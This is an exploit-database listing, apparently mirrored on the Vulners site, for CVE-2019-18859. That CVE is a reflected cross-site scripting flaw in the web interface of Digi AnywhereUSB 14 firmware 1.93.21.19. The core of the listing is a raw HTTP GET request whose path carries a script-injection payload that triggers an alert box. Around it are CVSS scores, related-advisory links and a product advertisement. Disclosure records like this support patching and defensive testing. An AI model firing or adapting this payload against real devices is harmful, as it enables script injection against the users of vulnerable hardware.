Lucene search

K

Digi AnywhereUSB 14 - Reflective Cross-Site Scripting

🗓️ 13 Jan 2020 00:00:00Reported by Raspina Net Pars GroupType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 122 Views

Digi AnywhereUSB 14 - Reflective Cross-Site Scripting. Vulnerability allows injection of malicious code

Show more
Related
Code
ReporterTitlePublishedViews
Family
exploitpack
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
13 Jan 202000:00
exploitpack
0day.today
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting Vulnerability
13 Jan 202000:00
zdt
Prion
Design/Logic Flaw
9 Jan 202021:15
prion
Cvelist
CVE-2019-18859
9 Jan 202020:07
cvelist
CVE
CVE-2019-18859
9 Jan 202021:15
cve
Packet Storm
Digi AnywhereUSB 14 Cross Site Scripting
13 Jan 202000:00
packetstorm
NVD
CVE-2019-18859
9 Jan 202021:15
nvd
# Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
# Date: 2019-11-10
# Exploit Author: Raspina Net Pars Group
# Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb
# Version: 1.93.21.19
# CVE : CVE-2019-18859

# PoC

GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


# Author Website: HTTPS://RNPG.info

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
13 Jan 2020 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS36.1
EPSS0.001
122
.json
Report